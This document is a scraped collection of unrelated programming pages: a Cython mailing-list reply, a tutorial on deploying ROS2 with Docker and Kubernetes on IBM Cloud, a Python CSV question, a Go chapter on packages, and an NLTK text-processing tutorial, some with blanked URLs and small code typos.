Ah, that's what it means. I saw something similar to this somewhere in some documentation, but the object keyword threw me off. To me, 'object' indicates something more on the python side than on the c side. Also, even though you can do this to ensure the struct declaration ends up in the header file, I would still make the case that currently something is a bit off in that the header file tries to use something which it has no information about (and in the process actually ends up creating its own empty struct type). Thanks for all the help. -Seth On 06/07/2011 06:24 PM, Greg Ewing wrote: >> On Sat, Jun 4, 2011 at 10:36 AM, Seth Shannin >> <sshannin at stwing.upenn.edu> wrote: >> >>> test.h:11: warning: 'struct __pyx_obj_4test_foo' declared inside >>> parameter >>> list >>> test.h:11: warning: its scope is only this definition or declaration, >>> which >>> is probably not what you want > > Not sure about Cython, but the way to to this in Pyrex > is to declare the class 'public' as well, and then the > struct declaration for it will be put in the .h file. > > You will need to supply C names for the struct and type > object as well, e.g. > > cdef public class foo[type FooType, object FooObject]: > ... > > The generated test.h file then contains > > struct FooObject { > PyObject_HEAD > int a; > int b; > }; > > __PYX_EXTERN_C DL_IMPORT(void) bar(struct FooObject *); > __PYX_EXTERN_C DL_IMPORT(struct FooObject) *make_foo(int,int); >
https://mail.python.org/pipermail/cython-devel/2011-June/000891.html
ROS2 on IBM Cloud Kubernetes [community-contributed]

About

This article describes how to get ROS2 running on IBM Cloud using Docker files. It first gives a brief overview of Docker images and how they work locally, and then explores IBM Cloud and how the user can deploy their containers on it. Afterwards, a short description of how the user can use their own custom packages for ROS2 from GitHub on IBM Cloud is provided. A walkthrough of how to create a cluster and utilize Kubernetes on IBM Cloud is provided, and finally the Docker image is deployed on the cluster. Originally published here and here.

ROS2 on IBM Cloud

In this tutorial, we show how you can easily integrate and run ROS2 on IBM Cloud with your custom packages. ROS2 is the new generation of ROS, which gives more control over multi-robot formations. With the advancements of cloud computing, cloud robotics are becoming more important in today's age. In this tutorial, we will go through a short introduction on running ROS2 on IBM Cloud. By the end of the tutorial, you will be able to create your own packages in ROS2 and deploy them to the cloud using Docker files.

The following instructions assume you're using Linux and have been tested with Ubuntu 18.04 (Bionic Beaver).

Step 1: Setting up your system

Before we go into how the exact process works, let's first make sure all the required software is properly installed. We'll point you towards the appropriate sources to set up your system and only highlight the details that pertain to our use-case.

a) Docker files?

Docker files are a form of containers that can run separately from your system; this way, you can set up potentially hundreds of different projects without affecting one another. You can even set up different versions of Linux on one machine, without the need for a virtual machine.
Docker files have the advantage of saving space and only utilizing your system resources when running. In addition, dockers are versatile and transferable. They contain all the required pre-requisites to run separately, meaning that you can easily use a docker file for a specific system or service without any cumbersome steps! Excited yet? Let's start off by installing docker on your system by following the following link. From the tutorial, you should have done some sanity checks to make sure docker is properly set up. Just in case, however, let's run the following command once again, which uses the hello-world docker image:

$ sudo docker run hello-world

You should obtain the following output:

b) ROS2 Image

ROS announced image containers for several ROS distributions in January 2019. More detailed instructions on the use of ROS2 docker images can be found here. Let's skip through that and get to the real deal right away: creating a local ROS2 docker. We'll create our own Dockerfile (instead of using a ready image) since we'll need this method for deployment on IBM Cloud. First, we create a new directory which will hold our Dockerfile and any other files we need later on, and navigate to it.
Using your favorite $EDITOR of choice, open a new file named Dockerfile (make sure the file naming is correct):

$ mkdir ~/ros2_docker
$ cd ~/ros2_docker
$ $EDITOR Dockerfile

Insert the following in the Dockerfile, and save it (also found here):

FROM ros:foxy

# install ros package
RUN apt-get update && apt-get install -y \
      ros-${ROS_DISTRO}-demo-nodes-cpp \
      ros-${ROS_DISTRO}-demo-nodes-py && \
    rm -rf /var/lib/apt/lists/* && mkdir /ros2_home

WORKDIR /ros2_home

# launch ros package
CMD ["ros2", "launch", "demo_nodes_cpp", "talker_listener.launch.py"]

FROM: creates a layer from the ros:foxy Docker image
RUN: builds your container by installing the ROS demo packages into it and creating a directory called /ros2_home
WORKDIR: informs the container where the working directory should be for it

Of course, you are free to change the ROS distribution (foxy is used here) or change the directory name. The above docker file sets up ROS foxy and installs the demo nodes for C++ and Python. Then it launches a file which runs a talker and a listener node. We will see it in action in just a few, but they act very similar to the publisher-subscriber example found in the ROS wiki.

Now, we are ready to build the docker image to run ROS2 in it (yes, it is THAT easy!). Note: if you have errors due to insufficient privileges or permission denied, try running the command with sudo privileges:

$ docker build .
# You will see a bunch of lines that execute the docker file instructions followed by:
Successfully built 0dc6ce7cb487

0dc6ce7cb487 will most probably be different for you, so keep note of it and copy it somewhere for reference.
You can always go back and check the docker images you have on your system using:

$ sudo docker ps -as

Now, run the docker file using:

$ docker run -it 0dc6ce7cb487
[INFO] [launch]: All log files can be found below /root/.ros/log/2020-10-28-02-41-45-177546-0b5d9ed123be-1
[INFO] [launch]: Default logging verbosity is set to INFO
[INFO] [talker-1]: process started with pid [28]
[INFO] [listener-2]: process started with pid [30]
[talker-1] [INFO] [1603852907.249886590] [talker]: Publishing: 'Hello World: 1'
[listener-2] [INFO] [1603852907.250964490] [listener]: I heard: [Hello World: 1]
[talker-1] [INFO] [1603852908.249786312] [talker]: Publishing: 'Hello World: 2'
[listener-2] [INFO] [1603852908.250453386] [listener]: I heard: [Hello World: 2]
[talker-1] [INFO] [1603852909.249882257] [talker]: Publishing: 'Hello World: 3'
[listener-2] [INFO] [1603852909.250536089] [listener]: I heard: [Hello World: 3]
[talker-1] [INFO] [1603852910.249845718] [talker]: Publishing: 'Hello World: 4'
[listener-2] [INFO] [1603852910.250509355] [listener]: I heard: [Hello World: 4]
[talker-1] [INFO] [1603852911.249506058] [talker]: Publishing: 'Hello World: 5'
[listener-2] [INFO] [1603852911.250152324] [listener]: I heard: [Hello World: 5]
[talker-1] [INFO] [1603852912.249556670] [talker]: Publishing: 'Hello World: 6'
[listener-2] [INFO] [1603852912.250212678] [listener]: I heard: [Hello World: 6]

If it works correctly, you should see something similar to what is shown above. As can be seen, there are two ROS nodes (a publisher and a subscriber) running, and their output is provided to us through ROS INFO.

Step 2: Running the image on IBM Cloud

The following steps assume you have an IBM Cloud account and have the ibmcloud CLI installed. If not, please check this link out to get that done first.
We also need to make sure that the CLI plug-in for the IBM Cloud Container Registry is installed by running the command:

$ ibmcloud plugin install container-registry

Afterwards, log in to your ibmcloud account through the terminal:

$ ibmcloud login --sso

From here, let's create a container registry namespace. Make sure you use a unique name that is also descriptive as to what it is. Here, I used ros2nasr.

$ ibmcloud cr namespace-add ros2nasr

IBM Cloud has a lot of shortcuts that help us get our container onto the cloud right away. The command below builds the container and tags it with the name ros2foxy and the version of 1. Make sure you use the correct registry name you created, and you are free to change the container name as you wish. The . at the end indicates that the Dockerfile is in the current directory (and it is important); if not, change it to point to the directory containing the Dockerfile.

$ ibmcloud cr build --tag registry.bluemix.net/ros2nasr/ros2foxy:1 .

You can now make sure that the container has been pushed to the registry you created by running the following command:

$ ibmcloud cr image-list
Listing images...
REPOSITORY                    TAG   DIGEST         NAMESPACE   CREATED          SIZE     SECURITY STATUS
us.icr.io/ros2nasr/ros2foxy   1     031be29301e6   ros2nasr    36 seconds ago   120 MB   No Issues
OK

Next, it is important to log in to your registry to run the docker image. Again, if you face a permission denied error, perform the command with sudo privileges. Afterwards, run your docker file as shown below.

$:1

Where ros2nasr is the name of the registry you created and ros2foxy:1 is the tag of the docker container and the version, as explained previously. You should now see your docker file running and providing similar output to that you saw when you ran it locally on your machine.

Step 3: Using Custom ROS2 Packages

So now we have the full pipeline working, from creating the Dockerfile all the way to deploying it and seeing it work on IBM Cloud.
But what if we want to use a custom set of packages we (or someone else) created? Well, that all has to do with how you set up your Dockerfile. Let's use the example provided by ROS2 here. Create a new directory with a new Dockerfile (or overwrite the existing one) and add the following in it (or download the file here):

ARG FROM_IMAGE=ros:foxy
ARG OVERLAY_WS=/opt/ros/overlay_ws

# multi-stage for caching
FROM $FROM_IMAGE AS cacher

# clone overlay source
ARG OVERLAY_WS
WORKDIR $OVERLAY_WS/src
RUN echo "\
repositories: \n\
  ros2/demos: \n\
    type: git \n\
    url: \n\
    version: ${ROS_DISTRO} \n\
" > ../overlay.repos
RUN vcs import ./ < ../overlay.repos

# copy manifests for caching
WORKDIR /opt
RUN mkdir -p /tmp/opt && \
    find ./ -name "package.xml" | \
      xargs cp --parents -t /tmp/opt && \
    find ./ -name "COLCON_IGNORE" | \
      xargs cp --parents -t /tmp/opt || true

# multi-stage for building
FROM $FROM_IMAGE AS builder

# overlay source
COPY --from=cacher $OVERLAY_WS/src ./src
ARG OVERLAY_MIXINS="release"
RUN . /opt/ros/$ROS_DISTRO/setup.sh && \
    colcon build \
      --packages-select \
        demo_nodes_cpp \
        demo_nodes_py \
      --mixin $OVERLAY_MIXINS

# source entrypoint setup
ENV OVERLAY_WS $OVERLAY_WS
RUN sed --in-place --expression \
      '$isource "$OVERLAY_WS/install/setup.bash"' \
      /ros_entrypoint.sh

# run launch file
CMD ["ros2", "launch", "demo_nodes_cpp", "talker_listener.launch.py"]

Going through the lines shown, we can see how we can add custom packages from GitHub in 4 steps:

1. Create an overlay with custom packages cloned from GitHub:

ARG OVERLAY_WS
WORKDIR $OVERLAY_WS/src
RUN echo "\
repositories: \n\
  ros2/demos: \n\
    type: git \n\
    url: \n\
    version: ${ROS_DISTRO} \n\
" > ../overlay.repos
RUN vcs import ./ < ../overlay.repos

2. Install package dependencies using rosdep.

3. Build the overlay source:

COPY --from=cacher $OVERLAY_WS/src ./src
ARG OVERLAY_MIXINS="release"
RUN . /opt/ros/$ROS_DISTRO/setup.sh && \
    colcon build \
      --packages-select \
        demo_nodes_cpp \
        demo_nodes_py \
      --mixin $OVERLAY_MIXINS

4. Run the launch file:

# run launch file
CMD ["ros2", "launch", "demo_nodes_cpp", "talker_listener.launch.py"]

Likewise, we can change the packages used, install their dependencies, and then run them.

Back to IBM Cloud

With this Dockerfile, we can follow the same steps we did before to deploy it on IBM Cloud. Since we already have our registry created, and we're logged in to IBM Cloud, we directly build our new Dockerfile. Notice how I kept the tag the same but changed the version; this way I can update the docker image created previously. (You are free to create a completely new one if you want.)

$ ibmcloud cr build --tag registry.bluemix.net/ros2nasr/ros2foxy:2 .

Then, make sure you are logged in to the registry and run the new docker image:

$:2

You should see, again, the same output. However, this time we did it through custom packages from GitHub, which allows us to utilize our personally created packages for ROS2 on IBM Cloud.

Extra: Deleting Docker Images

As you may find yourself in need of deleting a specific docker image(s) from IBM Cloud, this is how you should go about it!

List all the images you have and find all the ones that share the IMAGE name corresponding to registry.ng.bluemix.net/ros2nasr/ros2foxy:2 (in my case). Then delete them using their NAMES:

$ docker rm your_docker_NAMES

Delete the docker image from IBM Cloud using its IMAGE name:

$ docker rmi registry.ng.bluemix.net/ros2nasr/ros2foxy:2

Step 4: Kubernetes

a) Creating the Cluster

Create a cluster using the Console. The instructions are found here. The settings used are detailed below. These are merely suggestions and can be changed if you need to.
However, make sure you understand the implications of your choices:

- Plan: Standard
- Orchestration Service: Kubernetes v1.18.10
- Infrastructure: Classic
- Location:
  - Resource group: Default
  - Geography: North America (you are free to change this)
  - Availability: Single zone (you are free to change this, but make sure you understand the impact of your choices by checking the IBM Cloud documentation.)
  - Worker Zone: Toronto 01 (choose the location that is physically closest to you)
- Worker Pool:
  - Virtual - shared, Ubuntu 18
  - Memory: 16 GB
  - Worker nodes per zone: 1
- Master service endpoint: Both private & public endpoints
- Resource details (totally flexible):
  - Cluster name: mycluster-tor01-rosibm
  - Tags: version:1

After you create your cluster, you will be redirected to a page which details how you can set up the CLI tools and access your cluster. Please follow these instructions (or check the instructions here) and wait for the progress bar to show that the worker nodes you created are ready by indicating Normal next to the cluster name. You can also reach this screen from the IBM Cloud Console inside Kubernetes.

b) Deploying your Docker Image

Finally! Create a deployment configuration yaml file named ros2-deployment.yaml using your favorite $EDITOR and insert the following in it:

apiVersion: apps/v1
kind: Deployment
metadata:
  name: <deployment>
spec:
  replicas: <number_of_replicas>
  selector:
    matchLabels:
      app: <app_name>
  template:
    metadata:
      labels:
        app: <app_name>
    spec:
      containers:
      - name: <app_name>
        image: <region>.icr.io/<namespace>/<image>:<tag>

You should replace the tags shown between "<" and ">" as described here.
The file in my case would look something like this:

apiVersion: apps/v1
kind: Deployment
metadata:
  name: ros2-deployment
spec:
  replicas: 1
  selector:
    matchLabels:
      app: ros2-ibmcloud
  template:
    metadata:
      labels:
        app: ros2-ibmcloud
    spec:
      containers:
      - name: ros2-ibmcloud
        image: us.icr.io/ros2nasr/ros2foxy:2

Deploy the file using the following command:

$ kubectl apply -f ros2-deployment.yaml
deployment.apps/ros2-deployment created

Now your docker image is fully deployed on your cluster!

Step 5: Using CLI for your Docker Image

Navigate to your cluster through the IBM Cloud console Kubernetes. Click on Kubernetes dashboard on the top right corner of the page. You should now be able to see a full list of all the different parameters of your cluster as well as its CPU and memory usage. Navigate to Pods and click on your deployment. On the top right corner, click on Exec into pod.

Now you are inside your docker image! You can source your workspace (if needed) and run ROS2! For example:

root@ros2-deployment-xxxxxxxx:/opt/ros/overlay_ws# . install/setup.sh
root@ros2-deployment-xxxxxxxx:/opt/ros/overlay_ws# ros2 launch demo_nodes_cpp talker_listener.launch.py

Final Remarks

At this point, you are capable of creating your own docker image using ROS2 packages from GitHub. It is also possible, with little changes, to utilize local ROS2 packages as well. This could be the topic of another article. However, you are encouraged to check out the following Dockerfile, which uses a local copy of the demos repository. Similarly, you can use your own local package.
http://docs.ros.org/en/rolling/Tutorials/Deploying-ROS-2-on-IBM-Cloud.html
i have a folder that contains csv excel files that have numbers in the first column labeled 'x', second column labeled 'y', and third column labeled 'z'. i was trying to take all of the numbers in the x column and calculate the average and std, take all the numbers in the y column for all files and calculate the average and std... the same for the z column. this is what i have so far.... but it doesn't seem to work

import csv
import os
from numpy import array

path="A:\\yoyo\\heyy\\folder"
dirList=os.listdir(path)
for file in dirList:
    fullpath=os.path.join(path,file)
##    print fullpath
    with open(fullpath, 'rb') as f:
        nums=[[val for val in line.split(',')] for line in f.readlines()]
##        print line
    anums = array([nums])
    for c in range(anums.shape[1]):
        column = anums[:,c]
        col_mean=column.mean()
        col_std=column.std()
        print col_mean
        print col_std
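Several things go wrong above: the values are never converted from strings to numbers, array([nums]) wraps the data in an extra dimension, the header row is mixed in with the data, and the statistics end up computed per file instead of across all files. A working sketch under the stated assumptions (an x,y,z header row and comma-separated numbers); the demo writes two throwaway files into a temporary folder so it runs anywhere:

```python
import csv
import os
import tempfile

import numpy as np

def column_stats(folder):
    """Gather the x, y, z columns from every CSV in `folder` and
    return (means, stds) computed across all files at once."""
    rows = []
    for name in os.listdir(folder):
        if not name.lower().endswith('.csv'):
            continue
        with open(os.path.join(folder, name), newline='') as f:
            reader = csv.reader(f)
            next(reader)  # skip the x,y,z header row
            rows.extend([float(v) for v in row] for row in reader)
    data = np.array(rows)
    return data.mean(axis=0), data.std(axis=0)

# demo with two throwaway files
folder = tempfile.mkdtemp()
for name, body in [('a.csv', 'x,y,z\n1,2,3\n3,4,5\n'),
                   ('b.csv', 'x,y,z\n5,6,7\n7,8,9\n')]:
    with open(os.path.join(folder, name), 'w') as f:
        f.write(body)

means, stds = column_stats(folder)
print(means)  # [4. 5. 6.]
```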
https://www.daniweb.com/programming/software-development/threads/378860/csv-excel-files-calculating-the-avg-and-std-for-columns-python
Chapter 10: Packages and tools

Nowadays even a small program may involve 10,000 functions, but we can't build them all one by one; most of them come from others, reused in the form of packages and modules.

The Go standard library contains more than 100 packages; you can count them in a terminal with go list std | wc -l. Open-source packages can be searched at godoc.org.

Go also comes with a toolkit of various small tools that simplify workspace and package management.

10.1 Package introduction

Packages allow us to understand and update code in a modular way. At the same time, packages provide encapsulation, which keeps code from becoming messy and also makes it easy to distribute.

Go packages compile quickly because of three language features:

1. Imported packages must be explicitly declared at the beginning of the file, so the compiler does not need to read and analyze the whole source file to determine the package's dependencies.
2. Circular dependencies between packages are forbidden, so the relationships between packages form a directed acyclic graph; each package can be compiled independently, possibly concurrently.
3. The object file of a compiled package records not only the export information of the package itself but also its dependencies.

10.2 Import paths

Packages are imported through import declarations.
For packages outside the standard library, the import path is an Internet address, such as the HTML parser maintained by the Go team and a popular MySQL driver maintained by a third party:

import (
    "fmt"
    "math/rand"
    "encoding/json"

    "golang.org/x/net/html"

    "github.com/go-sql-driver/mysql"
)

10.3 Package declarations

Each Go source file must begin with a package declaration, which identifies the package when it is imported by others. Package members are accessed through the package name:

package main

import (
    "fmt"
    "math/rand"
)

func main() {
    fmt.Println(rand.Int())
}

Usually the last segment of a package's import path is the package name, but the two may differ. There are three exceptions to using the package name as the last segment of the import path: first, a main package is always named main, regardless of its import path; second, test files in a directory may have a package name ending in _test; third, the import path may carry a version suffix, such as "gopkg.in/yaml.v2", which does not appear in the package name.

10.4 Import declarations

Imports can be written one per line or grouped:

import (
    "fmt"
    "html/template"
    "os"

    "golang.org/x/net/html"
    "golang.org/x/net/ipv4"
)

If two imported packages have the same name, one of them must be renamed on import; the new name is visible only in the current file:

import (
    "crypto/rand"
    mrand "math/rand" // alternative name mrand avoids conflict
)

Renaming has three advantages: it resolves conflicts between imported packages with the same name; it can shorten cumbersome package names; and it avoids collisions with local variable names.

The compiler reports an error on circular imports.

10.5 Anonymous imports of packages

If we import a package but do not use it, the program fails to compile. However, sometimes we want the side effects of importing a package: evaluating its package-level initialization expressions and running its init functions.
We need to suppress the unused import error. We can use it_ To rename the imported package_ Is a blank identifier and cannot be accessed import _ "image/png" This is called anonymous import of packages. It is usually used to implement a compile time mechanism, and then selectively import additional packages at the main program entry. Let's take a look at its features and how it works package main import ( "fmt" "image" "image/jpeg" "io" "os" ) func main() { if err := toJPEG(os.Stdin, os.Stdout); err != nil { fmt.Fprintf(os.Stderr, "jpeg:%v\n", err) os.Exit(1) } } func toJPEG(in io.Reader, out io.Reader) error { img, kind, err := image.Decode(in) if err != { return err } fmt.Fprintln(os.Stderr,"Input format =",kind) return jpeg.Encode(out,img,&jpeg.Options{Quality: 95}) } If we give it an appropriate input, it can be successfully converted to output $ go build gopl.io/ch3/mandelbrot $ go build gopl.io/ch10/jpeg $ ./mandelbrot | ./jpeg >mandelbrot.jpg Input format = png If there is no anonymous import, it can compile, but it will not output correctly $ go build gopl.io/ch10/jpeg $ ./mandelbrot | ./jpeg >mandelbrot.jpg jpeg: image: unknown format Here is how the code works package png // image/png func Decode(r io.Reader) (image.Image, error) func DecodeConfig(r io.Reader) (image.Config, error) func init() { const pngHeader = "\x89PNG\r\n\x1a\n" image.RegisterFormat("png", pngHeader, Decode, DecodeConfig) } The final effect is that the main program only needs to anonymously import a specific image driver package to use image Decode decodes the image in the corresponding format The database package database/sql also adopts a similar technology, so that users can choose to import database drivers according to their needs, such as: import ( "database/sql" _ "github.com/lib/pq" // enable support for Postgres _ "github.com/go-sql-driver/mysql" // enable support for MySQL ) db, err = sql.Open("postgres", dbname) // OK db, err = sql.Open("mysql", dbname) // OK db, err = 
sql.Open("sqlite3", dbname) // returns error: unknown driver "sqlite3"

10.6 Packages and naming

When creating a package, give it a short name, and avoid names that are likely to be used for common local variables. Package names are generally singular, though some are plural for other reasons.

When designing a package, consider how the package name and its member names work together, as in these examples:

bytes.Equal
flag.Int
http.Get
json.Marshal

Consider the naming pattern of the strings package, which provides various operations on strings:

package strings

func Index(needle, haystack string) int

type Replacer struct{ /* ... */ }
func NewReplacer(oldnew ...string) *Replacer

type Reader struct{ /* ... */ }
func NewReader(s string) *Reader

Members such as strings.Index and strings.Replacer read naturally as operations on strings.

Other packages describe a single data type, such as html/template and math/rand: they expose one main data structure with its related methods, plus a function named New to create instances:

package rand // "math/rand"

type Rand struct{ /* ... */ }
func New(source Source) *Rand

This can lead to repetition in names such as template.Template or rand.Rand, which is one reason these package names are often so short.

At the other extreme are packages like net/http, with many names and comparatively few data types, because they perform a complex task. Despite having nearly twenty types and many more functions, the most important members of the package still have the simplest, clearest names: Get, Post, Handle, Error, Client, and Server.
https://programmer.ink/think/go-language-bible-chapter-10-packages-and-tools-10.1-10.7.html
by Charlie Greenbacker (@greenbacker)

This presentation will cover a handful of the NLP building blocks provided by NLTK (and a few additional libraries), including extracting text from HTML, stemming & lemmatization, frequency analysis, and named entity recognition. Several of these components will then be assembled to build a very basic document summarization program.

Obviously, you'll need Python installed on your system to run the code examples used in this presentation. We enthusiastically recommend using Anaconda, a Python distribution provided by Continuum Analytics. Anaconda is free to use, it includes nearly 200 of the most commonly used Python packages for data analysis (including NLTK), and it works on Mac, Linux, and yes, even Windows.

We'll make use of the following Python packages in the example code:

Please note that the readability package is not distributed with Anaconda, so you'll need to download & install it separately using something like easy_install readability-lxml or pip install readability-lxml. If you don't use Anaconda, you'll also need to download & install the other packages separately using similar methods. Refer to the homepage of each package for instructions.

You'll want to run nltk.download() one time to get all of the NLTK packages, corpora, etc. (see below). Select the "all" option. Depending on your network speed, this could take a while, but you'll only need to do it once.

One of the examples will use NLTK's interface to the Stanford Named Entity Recognizer, which is distributed as a Java library. In particular, you'll want the following files handy in order to run this particular example:

The first thing we'll need to do is import nltk:

import nltk

The first time you run anything using NLTK, you'll want to go ahead and download the additional resources that aren't distributed directly with the NLTK package. Upon running the nltk.download() command below, the NLTK Downloader window will pop up.
In the Collections tab, select "all" and click on Download. As mentioned earlier, this may take several minutes depending on your network connection speed, but you'll only ever need to run it a single time.

nltk.download()

Now the fun begins. We'll start with a pretty basic and commonly-faced task: extracting text content from an HTML page. Python's urllib package gives us the tools we need to fetch a web page from a given URL, but we see that the output is full of HTML markup that we don't want to deal with.

(N.B.: Throughout the examples in this presentation, we'll use Python slicing (e.g., [:500] below) to only display a small portion of a string or list. Otherwise, if we displayed the entire item, sometimes it would take up the entire screen.)

from urllib import urlopen

url = ""
html = urlopen(url).read()
html[:500]

Fortunately, NLTK provides a method called clean_html() to get the raw text out of an HTML-formatted string. It's still not perfect, though, since the output will contain page navigation and all kinds of other junk that we don't want, especially if our goal is to focus on the body content from a news article, for example.

text = nltk.clean_html(html)
text[:500]

If we just want the body content from the article, we'll need to use two additional packages. The first is a Python port of a Ruby port of a Javascript tool called Readability, which pulls the main body content out of an HTML document and subsequently "cleans it up." The second package, BeautifulSoup, is a Python library for pulling data out of HTML and XML files. It parses HTML content into an easily-navigable nested data structure. Using Readability and BeautifulSoup together, we can quickly get exactly the text we're looking for out of the HTML, (mostly) free of page navigation, comments, ads, etc. Now we're ready to start analyzing this text content.
from readability.readability import Document
from bs4 import BeautifulSoup

readable_article = Document(html).summary()
readable_title = Document(html).title()
soup = BeautifulSoup(readable_article)
print '*** TITLE *** \n\"' + readable_title + '\"\n'
print '*** CONTENT *** \n\"' + soup.text[:500] + '[...]\"'

Here's a little secret: much of NLP (and data science, for that matter) boils down to counting things. If you've got a bunch of data that needs analyzin' but you don't know where to start, counting things is usually a good place to begin. Sure, you'll need to figure out exactly what you want to count, how to count it, and what to do with the counts, but if you're lost and don't know what to do, just start counting.

Perhaps we'd like to begin (as is often the case in NLP) by examining the words that appear in our document. To do that, we'll first need to tokenize the text string into discrete words. Since we're working with English, this isn't so bad, but if we were working with a non-whitespace-delimited language like Chinese, Japanese, or Korean, it would be much more difficult.

In the code snippet below, we're using two of NLTK's tokenize methods to first chop up the article text into sentences, and then each sentence into individual words. (Technically, we didn't need to use sent_tokenize(), but if we only used word_tokenize() alone, we'd see a bunch of extraneous sentence-final punctuation in our output.)

By printing each token alphabetically, along with a count of the number of times it appeared in the text, we can see the results of the tokenization. Notice that the output contains some punctuation & numbers, hasn't been lowercased, and counts BuzzFeed and BuzzFeed's separately. We'll tackle some of those issues next.
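The count-things idea isn't NLTK-specific. A rough sketch with Python's built-in collections.Counter (Python 3 syntax, unlike the Python 2 notebook, and an invented sample sentence) shows the same raw-count behavior, including punctuation, case, and possessives being counted separately:

```python
from collections import Counter

# Naive whitespace tokenization of a made-up sample sentence.
text = "BuzzFeed wrote that BuzzFeed's growth, growth everywhere, was real."
tokens = text.split()

counts = Counter(tokens)
for token, count in sorted(counts.items()):
    print(token, count)

# Raw counts treat "BuzzFeed" and "BuzzFeed's" as different tokens,
# and "growth," (with the trailing comma) differs from "growth".
```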
tokens = [word for sent in nltk.sent_tokenize(soup.text) for word in nltk.word_tokenize(sent)]
for token in sorted(set(tokens))[:30]:
    print token + ' [' + str(tokens.count(token)) + ']'

Stemming is the process of reducing a word to its base/stem/root form. Most stemmers are pretty basic and just chop off standard affixes indicating things like tense (e.g., "-ed") and possessive forms (e.g., "-'s"). Here, we'll use the Snowball stemmer for English, which comes with NLTK.

Once our tokens are stemmed, we can rest easy knowing that BuzzFeed and BuzzFeed's are now being counted together as... buzzfe? Don't worry: although this may look weird, it's pretty standard behavior for stemmers and won't affect our analysis (much). We also (probably) won't show the stemmed words to users -- we'll normally just use them for internal analysis or indexing purposes.

from nltk.stem.snowball import SnowballStemmer

stemmer = SnowballStemmer("english")
stemmed_tokens = [stemmer.stem(t) for t in tokens]
for token in sorted(set(stemmed_tokens))[50:75]:
    print token + ' [' + str(stemmed_tokens.count(token)) + ']'

Although the stemmer very helpfully chopped off pesky affixes (and made everything lowercase to boot), there are some word forms that give stemmers indigestion, especially irregular words. While the process of stemming typically involves rule-based methods of stripping affixes (making them small & fast), lemmatization involves dictionary-based methods to derive the canonical forms (i.e., lemmas) of words. For example, run, runs, ran, and running all correspond to the lemma run. However, lemmatizers are generally big, slow, and brittle due to the nature of the dictionary-based methods, so you'll only want to use them when necessary.

The example below compares the output of the Snowball stemmer with the WordNet lemmatizer (also distributed with NLTK). Notice that the lemmatizer correctly converts women into woman, while the stemmer turns lying into lie.
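The rule-based affix stripping described above can be caricatured in a few lines. This toy stemmer is my own and far cruder than Snowball, but it shows both the mechanism and why stems like buzzfe come out looking odd:

```python
# Strip a few common suffixes, longest first (a deliberately crude sketch).
SUFFIXES = ["'s", "ing", "ed", "es", "s"]

def crude_stem(word):
    word = word.lower()
    for suf in SUFFIXES:
        # Only strip if a non-trivial stem would remain.
        if word.endswith(suf) and len(word) > len(suf) + 1:
            return word[: -len(suf)]
    return word

print(crude_stem("BuzzFeed's"))  # possessive stripped
print(crude_stem("counted"))     # "-ed" stripped
print(crude_stem("lying"))       # "-ing" stripped, leaving a weird stem
```

Real stemmers like Snowball add many more rules (and exceptions) on top of this basic strip-the-suffix idea.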
Additionally, both replace eyes with eye, but neither of them properly transforms told into tell.

lemmatizer = nltk.WordNetLemmatizer()
temp_sent = "Several women told me I have lying eyes."

print [stemmer.stem(t) for t in nltk.word_tokenize(temp_sent)]
print [lemmatizer.lemmatize(t) for t in nltk.word_tokenize(temp_sent)]

Thus far, we've been working with lists of tokens that we're manually sorting, uniquifying, and counting -- all of which can get to be a bit cumbersome. Fortunately, NLTK provides a data structure called FreqDist that makes it more convenient to work with these kinds of frequency distributions. The code snippet below builds a FreqDist from our list of stemmed tokens, and then displays the top 25 tokens appearing most frequently in the text of our article. Wasn't that easy?

fdist = nltk.FreqDist(stemmed_tokens)
for item in fdist.items()[:25]:
    print item

Notice in the output above that most of the top 25 tokens are worthless. With the exception of things like facebook, content, user, and perhaps emot (emotion?), the rest are basically devoid of meaningful information. They don't really tell us anything about the article since these tokens will appear in just about any English document. What we need to do is filter out these stop words in order to focus on just the important material.

While there is no single, definitive list of stop words, NLTK provides a decent start. Let's load it up and take a look at what we get:

sorted(nltk.corpus.stopwords.words('english'))[:25]
stemmed_tokens_no_stop = [stemmer.stem(t) for t in stemmed_tokens if t not in nltk.corpus.stopwords.words('english')]

fdist2 = nltk.FreqDist(stemmed_tokens_no_stop)
for item in fdist2.items()[:25]:
    print item

Another task we might want to do to help identify what's "important" in a text document is named entity recognition (NER). Also called entity extraction, this process involves automatically extracting the names of persons, places, organizations, and potentially other entity types out of unstructured text. Building an NER classifier requires lots of annotated training data and some fancy machine learning algorithms, but fortunately, NLTK comes with a pre-built/pre-trained NER classifier ready to extract entities right out of the box. This classifier has been trained to recognize PERSON, ORGANIZATION, and GPE (geo-political entity) entity types.

(At this point, I should include a disclaimer stating No True Computational Linguist would ever use a pre-built NER classifier in the "real world" without first re-training it on annotated data representing their particular task. So please don't send me any hate mail -- I've done my part to stop the madness.)

In the example below (inspired by this gist from Gavin Hackeling and this post from John Price), we're defining a method to perform the following steps:

nltk.pos_tag()
nltk.ne_chunk()

We then apply this method to a sample sentence and parse the clunky output format provided by nltk.ne_chunk() (it comes as a nltk.tree.Tree) to display the entities we've extracted. Don't let these nice results fool you -- NER output isn't always this satisfying. Try some other sample text and see what you get.
def extract_entities(text):
    entities = []
    for sentence in nltk.sent_tokenize(text):
        chunks = nltk.ne_chunk(nltk.pos_tag(nltk.word_tokenize(sentence)))
        entities.extend([chunk for chunk in chunks if hasattr(chunk, 'node')])
    return entities

for entity in extract_entities('My name is Charlie and I work for Altamira in Tysons Corner.'):
    print '[' + entity.node + '] ' + ' '.join(c[0] for c in entity.leaves())

If you're like me, you've grown accustomed over the years to working with the Stanford NER library for Java, and you're suspicious of NLTK's built-in NER classifier (especially because it has chunk in the name). Thankfully, recent versions of NLTK contain a special NERTagger interface that enables us to make calls to Stanford NER from our Python programs, even though Stanford NER is a Java library (the horror!). Not surprisingly, the Python NERTagger API is slightly less verbose than the native Java API for Stanford NER.

To run this example, you'll need to follow the instructions for installing the optional Java libraries, as outlined in the Initial Setup section above. You'll also want to pay close attention to the comment that says # change the paths below to point to wherever you unzipped the Stanford NER download file.

from nltk.tag.stanford import NERTagger

# change the paths below to point to wherever you unzipped the Stanford NER download file
st = NERTagger('/Users/cgreenba/stanford-ner/classifiers/english.all.3class.distsim.crf.ser.gz',
               '/Users/cgreenba/stanford-ner/stanford-ner.jar', 'utf-8')

for i in st.tag('Up next is Tommy, who works at STPI in Washington.'.split()):
    print '[' + i[1] + '] ' + i[0]

Now let's try to take some of what we've learned and build something potentially useful in real life: a program that will automatically summarize documents. For this, we'll switch gears slightly, putting aside the web article we've been working on until now and instead using a corpus of documents distributed with NLTK.
